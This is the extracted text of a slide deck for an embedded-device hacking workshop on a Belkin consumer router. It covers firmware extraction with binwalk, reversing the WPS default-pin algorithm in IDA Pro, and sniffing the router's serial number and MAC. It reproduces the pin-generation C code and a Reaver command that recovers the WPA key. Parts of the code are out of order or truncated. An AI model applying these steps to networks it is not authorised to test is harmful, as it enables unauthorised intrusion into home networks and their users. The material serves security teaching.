Embedded device hacking Session i

Embedded Device Hacking
Session I: Obtaining Initial Remote Access
By: Malachi Jones, PhD

About Me
 Education
 Bachelors Degree: Computer Engineering (Univ. of Florida, 2007)
 Master’s Degree: Computer Engineering (GeorgiaTech, 2009)
 PhD: Computer Engineering (GeorgiaTech, 2013)
 Cyber Security Experience
 Harris: Cyber Software Engineer (2013-2014)
 Harris: Vulnerability Researcher (2015)
 BoozAllen DarkLabs : Embedded Security Researcher (2016- Present)
https://www.linkedin.com/in/malachijonesphd

About Dark Labs
BoozAllen Dark Labs is an elite team of security researchers,
penetration testers, reverse engineers, network
analysts, and data scientists, dedicated to stopping
cyber attacks before they occur.1
(1 http://darklabs.bah.com)

I. Motivation: Ubiquity of embedded devices
II. Objectives ofWorkshop
III. WorkshopOverview
IV. TheWorkshop: Hacking a consumer router
 Session I: Obtaining Initial Remote Access
 Session II: Exploitation
 Session III: pwnage
V. Conclusion
Outline

Motivation
 Ubiquity of Embedded Devices
Critical Infrastructure
(Nuclear Power Plant)
Life Critical Systems
(Pace Maker)
Financial Infrastructure
(Banking & Investing)
Internet ofThings (IoT)
(IoT Gadgets)
Commercial Products
(Network Switch)
Transportation Systems
(Jeep)

2015: AYear of Embedded Exploitation
(Link)

(Link)
2016: The Exploitation Continues…

?????
2017: Its Just Getting Started

Objectives of Workshop
 Explore practical applications of reverse engineering
 Discuss concepts/techniques that hackers utilize to uncover
vulns in real-world embedded devices.
 Provide a hands-on introduction to key pen-testing tools

Workshop Overview
Want to understand the process of hacking/ pentesting a
sophisticated embedded system such as a car?

Workshop Overview
 A first step is to first learn how to hack a consumer router
 Why?
 Its cheaper, so if you make a mistake and brick it, you won’t be
out of +60k
 Although a simpler system and easier target, the core
pentesting principles and processes are similar

Workshop Overview
 We’ll focus on a Belkin router (F5D7234-4 version 5)
 Its pretty cheap (<$20) and is a pretty soft target that is
suitable for individuals new to embedded hacking

Workshop Overview
Overall Hacking Objective:
Compromise an initial target (e.g wifi router) and then use that
target as leverage to compromise other targets

Workshop Overview
Steps to Achieve Hacking Objective:
1) Obtain Initial remote access to the device
 Wifi Router Context: This means the ability to connect to its
network, which often requires knowledge of the wpa password

Workshop Overview
2) Escalate privileges on device to admin/root
 Wifi Router Context: Administrative privileges can allow us to
control/manipulate the IP traffic of clients connected to device

Workshop Overview
3) Exploit privileges to compromise other devices
 Wifi Router Context: Send clients malicious IP traffic that allows
us to compromise them also

 Router Exploitation Example (via Redirection Attack)
 Step 1: Hacker gains remote access to router
 Step 2: Elevates privileges to admin
 Step 3: Changes DNS settings on router
 Step 4: Router now talks to hacker’s server to resolve name address
 Step 5: www.cnn.com now resolves to an IP address of hacker’s server
 Step 6: Hacker provides malicious traffic to devices on the network
 Step 7:
17
WorkshopOverview
Pwned

WorkshopOverview
 The workshop will be organized into three sessions that
capture the pen-testing phases of going from discovery to
p0wnage
 Session I: Discovery of a vulnerability in theWPS
implementation to obtain initial access on device
 Session II: Exploring weaknesses in the web management
interface to gain administrative access
 Session III: Development of a proof of concept that
demonstrates how aWindows 7 user can be p0wned via web
browser with a maliciously configured router

 Step 7:
19
WorkshopOverview
Pwned
Session I

 Step 7:
20
WorkshopOverview
Pwned
Session II

 Step 7:
21
WorkshopOverview
Pwned
Session
III

The Workshop
Hacking a Consumer Router

TheWorkshop
Session I:
Obtaining Initial Remote Access
to the Device

Session I: Outline
I. Overview
II. Background
III. Required Material
IV. Lab 1: Firmware Data Extraction with Binwalk
V. Lab 2: Reversing/Bug Hunting with IDA Pro
VI. Lab 3: Obtain Initial Access with Wireshark & Reaver

Session I: Overview (tldr)
 WPS pin method is on by default on virtually all consumer routers
 Design flaw inWPS allows pin to be brute forced in under 11000
attempts
 Once aWPS pin is known, a tool such as Reaver can be utilized to
retrieve the WPA key instantaneously (see next slide)
 On some routers (including F5D7234-4), the default pin can be
computed by reverse engineering the pin generation algorithm

Session I:The Big Picture
Overall goal is to figure out what the router’s WPA
password is so that we can gain initial access to
router and the connected clients
Reverse
engineer
algorithm
Extract
Firmware to find
pin algorithm
Obtain inputs to
algorithm by
sniffing traffic
Generate pin
and use reaver
to get password

password so that we can gain initial access to router
and the connected clients
Reverse
engineer
algorithm
Extract
Firmware to find
pin algorithm
Obtain inputs to
algorithm by
sniffing traffic
Generate pin
and use reaver
to get password
Lab 1

Reverse
engineer
algorithm
Extract
Firmware to find
pin algorithm
Obtain inputs to
algorithm by
sniffing traffic
Generate pin
and use reaver
to get password
Lab 2

Reverse
engineer
algorithm
Extract
Firmware to find
pin algorithm
Obtain inputs to
algorithm by
sniffing traffic
Generate pin
and use reaver
to get password
Lab 3

End Result: Gain Access to Management Interface
Session I: The Big Picture

 Step 7:
31
Pwned
Session I

Session I: Background
1. WPS Design Flaw Explained
2. Exploiting Belkin’s PIN Generation Algorithm
3. IDA Pro

Background:WPS Explained
 Wi-Fi Protected Setup (WPS) was created byWi-Fi Alliance in 2006
 Goal to make it easy for home users to add new devices securely to
network w/o entering long passphrases
 One of the modes allowed for user to enter the router’s 8 digit pin
to connect a desired device to network

 Design Flaw Explained
 WPS has an 8 digit pin numeric pin (0-9)
 Number of attempts to bruteforce an 8 digit pin
1 2 3 4 5 6 7 8
108 = 100 million

 The 8th digit pin is a checksum
 Number of attempts to bruteforce a 7 digit pin
1 2 3 4 5 6 7 8
107 = 10 million

 Pin split into two groups and a Nack/ack is sent that indicates if the pin
for that group is correct
 Number of attempts to bruteforce a 7 digit pin split into groups( 4+ 3)
1 2 3 4 5 6 7 8
104 + 103= 11000
Nack/ Ack Nack/ Ack

 We could exploit this design flaw for the Belkin
router that we are targeting to obtain pin
 However, there is aWPS implementation flaw,
specific to this router, that allows us to get the pin
in 1 try vs 11,000

Background: Belkin Pin Generation Exploit
 Pin generation exploit material presented in this workshop is
based on the write-up by Craig @ www.devttys0.com
 /DEV/TTYS0 provides excellent material on embedded hacking
in general and router hacking in particular

Background: Belkin Pin Generation Exploit
 BelkinWPS Pin Algorithm
 Note: Serial ID and WLAN MAC can be obtained by sniffing
certain packets that are broadcast by the router
PinGeneration
Algorithm
12345678
Serial ID
WLAN MAC

Background: IDA Pro
 De facto tool for disassembling, decompiling, and debugging
binaries
 Supports a wide array of processor architectures that include the
following:
 MIPS
 ARM
 X86/x64

 Code Flow of Routine (sub_43A53C)
Background: IDA Pro Features

Code Flow of Routine (sub_43A53C)
For loop
Loop back Here
nch taken to
ectively exit
ction if
referenced
ue is ‘0’

 IDA Scripting support
 Supports python scripting, which is known as IDAPython
 Provides a power way to add extensive utilities and features to python
 Also has a native language, IDC, which is a “C-like” language

 Decompiling with Hex-Rays (x86,x64, andARM)

ARM Disassembly
Decompiled
“Pseudo-C”

 For more information on IDA, there is a pretty awesome book
written by Chris Eagle

 Professional Edition : $1500
 Pro + Hex-rays decompiler (x86/x64 + ARM): $5500
 Freeware version (link)
 Very old edition w/o newer features including IDAPython
 only x86 disassembler support
 Still a good starting point
Background: Acquiring IDA Pro

 Binary Ninja (link)
 License: $99.00 (Personal License)
 Up and coming legitimate alternative/competitor to IDA Pro
 Supports x86/x64 , ARM, and MIPS
 Decompiler support
 OS Platforms:Windows, OSX , and Linux
Background: IDA Pro Alternatives

Background: IDA Pro Alternatives
Binary Ninja Screenshot

I. Overview
II. Background
V. Lab 2: Reversing/Bug Hunting with IDA Pro
Session I: Outline

Required Material
 Software
 Kali LinuxVM 1.X
 IDA Pro
 Vmware/VirtualBox
 Hardware
 Belkin F5D7234-4 version 5
 Wifi adapter w/ monitor mode
(e.g.TP-LINKTL-WN722N)

I. Overview
II. Background
IV. Big Picture
V. Lab 1: Firmware Data Extraction
VI. Lab 2: Reversing/Bug Hunting with IDA Pro
VII. Lab 3: Obtain Initial Access with Wireshark & Reaver
Session I: Outline

Lab 1: Firmware Data Extraction & Analysis
Reverse
engineer
algorithm
Extract
Firmware to find
pin algorithm
Obtain inputs to
algorithm by
sniffing traffic
Generate pin
and use reaver
to get password
Lab 1

Lab 1: Firmware Data Extraction & Analysis
 Steps for Extraction & Analysis
1. Install squashfs-tools if not installed
2. Perform initial analysis of firmware w/ Binwalk
3. Extract firmware data
4. Explore the squash file system folder

Extraction and Analysis (Steps)
1) Install squashfs-tools if not installed
(Next Slide)

Install squashfs-tools if not installed
$ sudo apt-get install squashfs-tools

2) Let binwalk do an initial analysis
of firmware
(Next Slide)

Initial analysis with Binwalk
$ sudo binwalk DIR810LB1_FW203B02.bin payload);

3) Extract firmware data
(Next Slide)

Extract Firmware Data
$ sudo binwalk –e DIR810LB1_FW203B02.bin

4) Explore files in the squash file
system folder
(Next Slides)

Explore squash filesystem
ls –l /$absolute-path-to-squash-folder

Explore squash filesystem
ls –l /$absolute-path-to-squash-folder/sbin
Contains theWPS pin
generation logic

Lab 1: Q&A
 Why are we using Dlink firmware instead of Belkin?
 Dlink has symbols (e.g. function names) which makes it easier to follow for
those newer to reversing
 Stripped firmware (i.e. no symbols) can be very difficult and take a substantial
amount of time to reverse
 Pin generation algorithm is conceptually similar between the Dlink and Belkin
routers
 What is a technique that can be used to help reverse engineer
stripped binaries?
 Make use of the debug strings found in binary to build intuition about what a
routine is doing

Lab 1: Q&A
 How did we know theWPS pin generation logic could be found
at the following location: /sbin/ncc?
 Can create an IDAPython script that iterates through the binaries in the
filesystem to search for specific symbols and strings
 Strings and symbols of interest could contain “WPS”, “WPS Pin”, “Pin
generation” , etc….
 How can the firmware be acquired?
 [Easy] Manufacturer’s website
 [Difficult] Manual extraction from the device via JTAG or the serial port (see
next 2 slide)
 Note: Forge Hackerspace has a workshop on manual firmware extraction !!

LinksysWRT120N PCB (Serial Port)
Serial Port

 Additional Resources
 Reverse Engineering Firmware: http://www.devttys0.com/2011/05/reverse-
engineering-firmware-linksys-wag120n/
Lab 1: Firmware Data Extraction

I. Overview
II. Background
V. Lab 2: Reversing with IDA Pro
Session I: Outline

Lab 2: Reversing with IDA Pro
Reverse
engineer
algorithm
Extract
Firmware to find
pin algorithm
Obtain inputs to
algorithm by
sniffing traffic
Generate pin
and use reaver
to get password
Lab 2

 Description
 In this lab, we will take a look at the binary ncc, located in /sbin of the
squash filesystem
 Since ncc has quite a bit ofWPS logic, which includes the pin generation
algorithm, we’ll do some exploring
 We’ll walk through the process of locating a code segment of interest (wps
algorithm) and illustrate the process of reversing the segment into C code

 Steps for Bug Hunting and Reversing
1. Load the binary ncc into IDA Pro for analysis
2. Hunt for the pin generation algorithm
3. Analyze the inputs of the algorithm
4. Reverse algorithm segment into C code

1) Load the binary ncc into IDA Pro for
analysis
(Next Slide)
Lab 2: Reversing with IDA Pro (Steps)

Load the binary ncc into IDA Pro
1a. Launch IDA Pro

1b. Click “New”

1c. Drag ncc binary into IDA
ncc binary
IDA detects that
binary is a
MIPS ELF

1d. Click “ok”

1e. Wait for IDA to finish analyzing the binary

1f. IDA indicates auto analysis has been finished
Auto analysis
complete

2) Hunt for the pin generation
algorithm
(Next Slide)
Reversing with IDA Pro (Steps)

Hunt for the pin generation algorithm
1a. See if you can find the pin generation routine

a. (Hint:What happens when I search for “router” in the Function Window)
Note: Ctrl+F brings up search box
Term “router” entered into the function name
filter

a. (Hint:What happens when I search for “router” in the Function Window)
Term “router” entered
into the function
name filter

a. (Hint:Try some search terms relevant to the algorithm we’re trying to find)
Try your own search
terms???

a. (Try a few more keywords before you go to the next slide!!!)
Try your own
search terms
???

b. Let’s try the keyword “default” and see what we get
This looks interesting

c. Double click on “get_default_pin”

c. (Continued…)

3)Analyzing the pin algorithm in
subroutine get_default_pin
(Next Slide)
Lab 2: Reversing with IDA Pro (Steps)

Analyze pin generation algorithm
a. Lets examine possible input sources to algorithm

Analyze pin generation algorithm
a. Lets examine possible input sources to algorithm
A call is made to a
sub-routine that
appears to get some
information
Subset of data from
lockAndGetInfo_log
will be formatted as
follows: “%c:%:c%:c%….”

 Any guesses on what “%c:%c…” might be?
b. Lets take a closer look at the sprintf call
Decompiling by
hand to pseudo C
char buffer [….];
char * data =lockAndGetInfo_log->interesting_data_element
……………………………………
sprintf (buffer, “%c%c:%c%c:%c%c:%c%c:%c%c:%c%c”, data[0], data[1],…,data[11]);

 Hints
 Its 12 characters with a “:” in between each pair of 2 characters
 This is a networking device
 What is something (e.g. identifier) that each networking devices
typically has that would be a good seed for a pin generation
algorithm?
c. Figure out what type of data could “%c%c…:%c%c” represent
char buffer [….];
……………………………………

 Answer: MAC address
 Unique across all networking devices
 12 bytes
 Often used in combination with other values to seed various algorithms
c. Figure out what type of data could “%c%c:..:%c%c” represent
char buffer [….];
……………………………………

4) Reverse algorithm segment into C
code
(Next Slide)

 As we will see, reversing assembly into C can be a tedious
and arduous process
 We will reverse the following code segment:
Reverse algorithm segment into C code
a. Reversing an example snippet of code

 Instruction ‘li’: Loads a constant value into a register
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
Disassembly Psuedo-C code
v0 = 0x38E38E39
 MIPS Instruction ‘li’:
 Loads a constant value into a register
 Value will be used for future arithmetic operation

li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
v0 = 0x38E38E39
[hi,lo] = v0*a3
 MIPS Instruction ‘multiu’:
 Multiply two 32-bit values (e.g. a3 & v0)
 Registers `hi’ & ‘lo’ store the resulting 64-bit product
hi (upper 32-bits) lo (lower 32-bits)
64-bit product

li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
v0 = 0x38E38E39
[hi,lo] = v0*a3
v0 = (v0*a3)>>32; right shift 32
 MIPS Instruction ‘mfhi’:
 Move value in ‘hi’ register to specified register (e.g. v0)
 This is equivalent to right shifting the 64-bit product of
v0 & a3 by 32-bits

li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
v0 = 0x38E38E39
[hi,lo] = v0*a3
v0 = (v0*a3)>>32; right shift 32
v0 = v0 >> 1;
= ((a3 * 0x38E38E39) >>32) >> 1
 MIPS Instruction ‘srl’:
 Shift right logical
 Logical means that the bit that replaces the most upper
bits as the shift occurs is the value ‘0’
 Lower bits that get shifted out are discarded

 Observations
 The net result of the assembly instructions is a complex looking
expression
 It turns out that this can be simplified quite a bit
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
Disassembly C code
v0 = ((a3 * 0x38E38E39) >>32) >> 1

 Observations
 Logical shifts have an associative property
 e.g. (v1>> 32) >> 1 == v1 >> 33
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
Disassembly C code
v0 = ((a3 * 0x38E38E39) >>32) >> 1
= (a3 * 0x38E38E39) >> 33

 Observations
 Right shifting a number by 1 has the effect of dividing that
number by 2.
 Therefore right shifting a number by 33 has the effect of
dividing that number by 2^33 = 8589934592
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
Disassembly C code
v0 = ((a3 * 0x38E38E39) >>32) >> 1
= (a3 * 0x38E38E39) >> 33
= (a3 * 0x38E38E39)/8589934592

 Observations
 (954437177)10 = 0x38E38E39
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
Disassembly C code
v0 = ((a3 * 0x38E38E39) >>32) >> 1
= (a3 * 0x38E38E39) >> 33
= (a3 * 0x38E38E39)/8589934592
= (a3)(954437177/8589934592)

 Observations
 1/9 ~=(954437177)/8589934592
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
Disassembly C code
v0 = ((a3 * 0x38E38E39) >>32) >> 1
= (a3 * 0x38E38E39) >> 33
= (a3 * 0x38E38E39)/8589934592
= (a3)(954437177/8589934592)
= (a3)(1/9)

 Observations
 As the above example illustrates, the disassembly performs operations such
as shifts to do multiplication and division
 What looks complex may be able to be decompiled into something much
simpler
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
v0 = ($a3)/9
Disassembly C code

 Luckily someone else (Craig) did all the grunt work in
decompiling the disassembly for us
 But we’ve seen how the general process for reversing works,
so in theory we could do it 
 On the next slides, we’ll show the complete C
implementation of the get_default_pin algoritm
b. Reversing the entire algorithm

 dd /*
* The largest possible remainder for any value divided by 10,000,000
* is 9,999,999 (7 digits). The smallest possible remainder is,
* obviously, 0.
*/
pin = pin % 10000000;
/* The pin needs to be at least 7 digits long */
if(pin < 1000000)
{
/*
* The largest possible remainder for any value divided by 9 is
* 8; hence this adds at most 9,000,000 to the pin value, and at
* least 1,000,000. This guarantees that the pin will be 7 digits
* long, and also means that it won't start with a 0.
*/
pin += ((pin % 9) * 1000000) + 1000000;
}
/*
* The final 8 digit pin is the 7 digit value just computed, plus a
* checksum digit. Note that in the disassembly, the wps_pin_checksum
* function is inlined (it's just the standard WPS checksum
implementation).
*/
pin = ((pin * 10) + wps_pin_checksum(pin));
sprintf(buf, "%08d", pin);
return pin;
}
get_default_pin (Dlink router)
unsigned int generate_default_pin(char *buf)
{
char *mac;
char mac_address[32] = { 0 };
unsigned int oui, nic, pin;
/* Get a pointer to the WAN MAC address */
mac = lockAndGetInfo_log()->wan_mac_address;
/*
* Create a local, NULL-terminated copy of the WAN MAC
(simplified from
* the original code's sprintf/memmove loop).
*/
sprintf(mac_address,
"%c%c%c%c%c%c%c%c%c%c%c%c", mac[0],
mac[1],
mac[2],
……
mac[11]
sscanf(mac_address, "%06X%06X", &oui, &nic);
/* Do some XOR munging of the NIC. */
pin = (nic ^ 0x55AA55);
pin = pin ^ (((pin & 0x0F) << 4) +
((pin & 0x0F) << 8) +
((pin & 0x0F) << 12) +
((pin & 0x0F) << 16) +
((pin & 0x0F) << 20));

 We could follow a similar process to reverse the Belkin Pin
algorithm
 Yet again, Craig has spared us the trouble
 On the next slide is the reversed C implementation of the
Belkin algorithm
c. Reversing the Belkin Pin Generation Algorithm

k1 = (sn[SN_DIGIT_2] +
sn[SN_DIGIT_3] +
nic[NIC_NIBBLE_0] +
nic[NIC_NIBBLE_1]) % 16;
k2 = (sn[SN_DIGIT_0] +
sn[SN_DIGIT_1] +
nic[NIC_NIBBLE_3] +
nic[NIC_NIBBLE_2]) % 16;
pin = k1 ^ sn[SN_DIGIT_1];
t1 = k1 ^ sn[SN_DIGIT_0];
t2 = k2 ^ nic[NIC_NIBBLE_1];
p1 = nic[NIC_NIBBLE_0] ^ sn[SN_DIGIT_1] ^ t1;
p2 = k2 ^ nic[NIC_NIBBLE_0] ^ t2;
p3 = k1 ^ sn[SN_DIGIT_2] ^ k2 ^ nic[NIC_NIBBLE_2];
k1 = k1 ^ k2;
pin = (pin ^ k1) * 16;
pin = (pin + t1) * 16;
pin = (pin + p1) * 16;
pin = (pin + t2) * 16;
pin = (pin + p2) * 16;
pin = (pin + k1) * 16;
pin += p3;
pin = (pin % 10000000) - (((pin % 10000000) /
10000000) * k1)
return (pin * 10) + wps_checksum(pin);
}
get_default_pin (Belkin router)
/* Munges the MAC and serial numbers to create a WPS pin
*/
int pingen(char *mac, char *serial)
{
#define NIC_NIBBLE_0 0
#define SN_DIGIT_0 0
int sn[4], nic[4], mac_len, serial_len;
int k1, k2, pin p1, p2, p3 t1, t2;
mac_len = strlen(mac);
serial_len = strlen(serial);
/* Get the four least significant digits of the serial
number */
sn[SN_DIGIT_0] = char2int(serial[serial_len-1]);
/* Get the four least significant nibbles of the MAC
address */
nic[NIC_NIBBLE_0] = char2int(mac[mac_len-1]);

Lab 2: Q&A
 Why are weaknesses in implementation of a security design not
discovered before product released?
 Companies care more about time-to-market
 Subscribe to the notion of security through obscurity
 How long does the reverse engineering process take?
 Depends on the device and the skills of the personnel
 Charlie and Chris (Chrysler Jeep hack) said it took them over 3.5 months and
they are pretty experienced

Lab 2: Q&A
 Is the reverse process always this tedious?
 In general…yes, if not more so.
 What things can make reversing harder?
 Stripped binaries (e.g. no symbols)
 Anti-debugging techniques
 Code obfuscation
 Writing original code in C++
 What is an ELF (Executable and Linkable Format)?
 Standard file format on Unix-like systems

Lab 2: Q&A
 Why is MIPS still popular in embedded devices?
 Licensing costs for MIPS is cheaper than ARM
 Why couldn’t we decompile using IDA Pro?
 IDA only supportsARM and x86/64
 No reliable decompilers for MIPS in general.

 Additional Resources
 Reversing D-Link’sWPS Pin Algorithm:
http://www.devttys0.com/2014/10/reversing-d-links-wps-pin-algorithm/

I. Overview
II. Background
V. Lab 2: Reversing with IDA Pro
VI. Lab 3: Obtain Initial Access with Wireshark
& Reaver
Session I: Outline

Lab 3: Obtaining initial access
Reverse
engineer
algorithm
Extract
Firmware to find
pin algorithm
Obtain inputs to
algorithm by
sniffing traffic
Generate pin
and use reaver
to get password
Lab 3

 Description
 In this lab, we will explore how to use our knowledge of the pin generation
algorithm to derive the WPA Key
 Specifically, we will first need to acquire relevant input information into the
algorithm by using Wireshark, and then run the algorithm to compute the
WPS PIN
 Then we’ll need to use Reaver to derive the WPA key from the WPS PIN

 Steps forObtaining initial access
1. Acquire serial and wlan mac w/ Wireshark
2. Compile & execute wps pin generation algorithm
3. Run Reaver to obtain theWPA key
4. Connect to the router utilizing obtained WPA key

1) Acquire Serial and WLAN MAC with
Wireshark
(Next Slides)

 We’ll need a wifi adapter that supports monitor mode
 Monitor mode enables monitoring of all traffic received
 Normally, the wifi adapter will filter out traffic not destined for it
 An example wifi adapter that supports monitor mode is theTP-LINKTL-WN722N
(pictured above); cost about $12
Acquiring serial and wlan information
a. Attach Wifi adapter (monitor mode support) to PC

b. Connect wifi adapter to guest Kali-Linux VM
Click this

b. Connect wifi adapter to guest Kali-Linux VM
ClickThis

c. Get the name of the wireless interface (e.g. wlanx),were x is 0-9
$ sudo iwconfig
Wireless
Interface Name

d. Bring the wireless interface down so we can configure it
$ sudo ifconfig wlanx down

e. Change the wifi mode to monitor
$ sudo iwconfig wlan0 mode monitor

f. Set the channel of wireless interface to channel y, where y in 1-12
$ sudo iwconfig wlan0 channel %y%

g. Bring the wireless interface back up
$ sudo ifconfig wlan0 up

h. Launch Wireshark
$ sudo wireshark

h. Click on wireless interface wlanx
Click this

i. Click Start
Click this

i. Click Start

i. (Continued)

j.Wait approximately 1-3 minute(s) as Wireshark captures packets

k. Stop the capture
Click to stop
Capture

l. Find a probe response message from Belkin_xx:xx:xx and click on it

m. Click on “IEEE 802.11 wireless LAN management” to expand the selection
Click to
expand

n. (After click)

o. Click on “Tagged parameters” to expand the selection
After Click

p. Click on “Vendor Specific” to expand the selection
After Click

q. Locate and record the Serial Number
Serial
Number

r. Locate and Record wlan MAC address of the Belkin router
MAC
Address

2. Compile & execute wps pin
generation algorithm
(Next Slides)

a. Download pingen algorithm source from here and save to home dir
Compile & Execute WPS pingen Algorithm

b. Compile pingen.c
$ sudo gcc -Wall pingen.c -o pingen

c. Executing the pingen binary to see usage
$ ./pingen

d. Pass in appropriate parameters and execute pingen to get pin
$ ./pingen xxxx xxxx
Default Pin

e.The Results
The Pin

Default Pin
e.The Results
The Pin

3. Run Reaver to obtainWPA Key
(Next Slides)

a. Executing Reaver with appropriate arguments
Run Reaver to Obtain WPA Key
reaver -i (monitor interface) -b (BSSID) -c (channel) -
--pin=(8 digit pin) –T 5 -vv

b.Wait for the Results (can take up to 30 seconds)
Run Reaver to Obtain WPA Key
WPA KEY

4. Connect to the router by utilizing
the obtainedWPA key
(Next Slides)

a. Bring the wireless interface down so we can configure it
Connect to router with WPA key
$ sudo ifconfig wlanx down

b. Change the wifi mode to managed
$ sudo iwconfig wlan0 mode managed

c. Bring the wireless interface back up
$ sudo ifconfig wlan0 up

c.Wait about a minute or so for the interface to be brought up

d.Click the networking icon
Click this icon

e. Select the Appropriate Access Point
Click on the
appropriateAP

f. Enter the WPA key and connect
EnterWPA Key

g.Wait while connection occurs
Connecting…

h. Connection is established
Success!!

h. Connect to web management server (Obtained Initial Access!!)

i. Log into web management interface (Preview of next session)
We’ll figure out how to gain
admin access in Session II

Lab 3: Q&A
 What’s the difference between monitor mode and promiscuous
mode?
 Promiscuous mode allows packets to be sniffed only on the AP the wifi
adapter is currently connected to
 Monitor mode allows all packets on a particular channel to be sniffed if
packets are in listening range
 Are there any other interesting wifi modes?
 Master mode, which allows the wifi adapter to behave as an access point
 TheTP Link adapter also supports this mode 

References
 [1]WPSVulnerability, University ofAlabama, Huntsville

Recap
Overall goal was to figure out what the router’s WPA
Reverse
engineer
algorithm
Extract
Firmware to find
pin algorithm
Obtain inputs to
algorithm by
sniffing traffic
Generate pin
and use reaver
to get password

Recap
Reverse
engineer
algorithm
Extract
Firmware to find
pin algorithm
Obtain inputs to
algorithm by
sniffing traffic
Generate pin
and use reaver
to get password
Lab 1

Recap
Reverse
engineer
algorithm
Extract
Firmware to find
pin algorithm
Obtain inputs to
algorithm by
sniffing traffic
Generate pin
and use reaver
to get password
Lab 2

Recap
Reverse
engineer
algorithm
Extract
Firmware to find
pin algorithm
Obtain inputs to
algorithm by
sniffing traffic
Generate pin
and use reaver
to get password
Lab 3

 Step 7:
174
Recap
Pwned
Session I

Conclusion
 In this session, we were able to obtain initial remote access to
the target device
 The next step is to elevate our privileges on the target to that
of an adminsitrator.
 This device uses client side authentication for admin
privileges, which we will exploit in Session II
 Session III will be focused on utilizing admin privileges from
Session II to compromise aWindows 7 device connected to
the Belkin router

Embedded device hacking Session i

More Related Content

Embedded device hacking Session i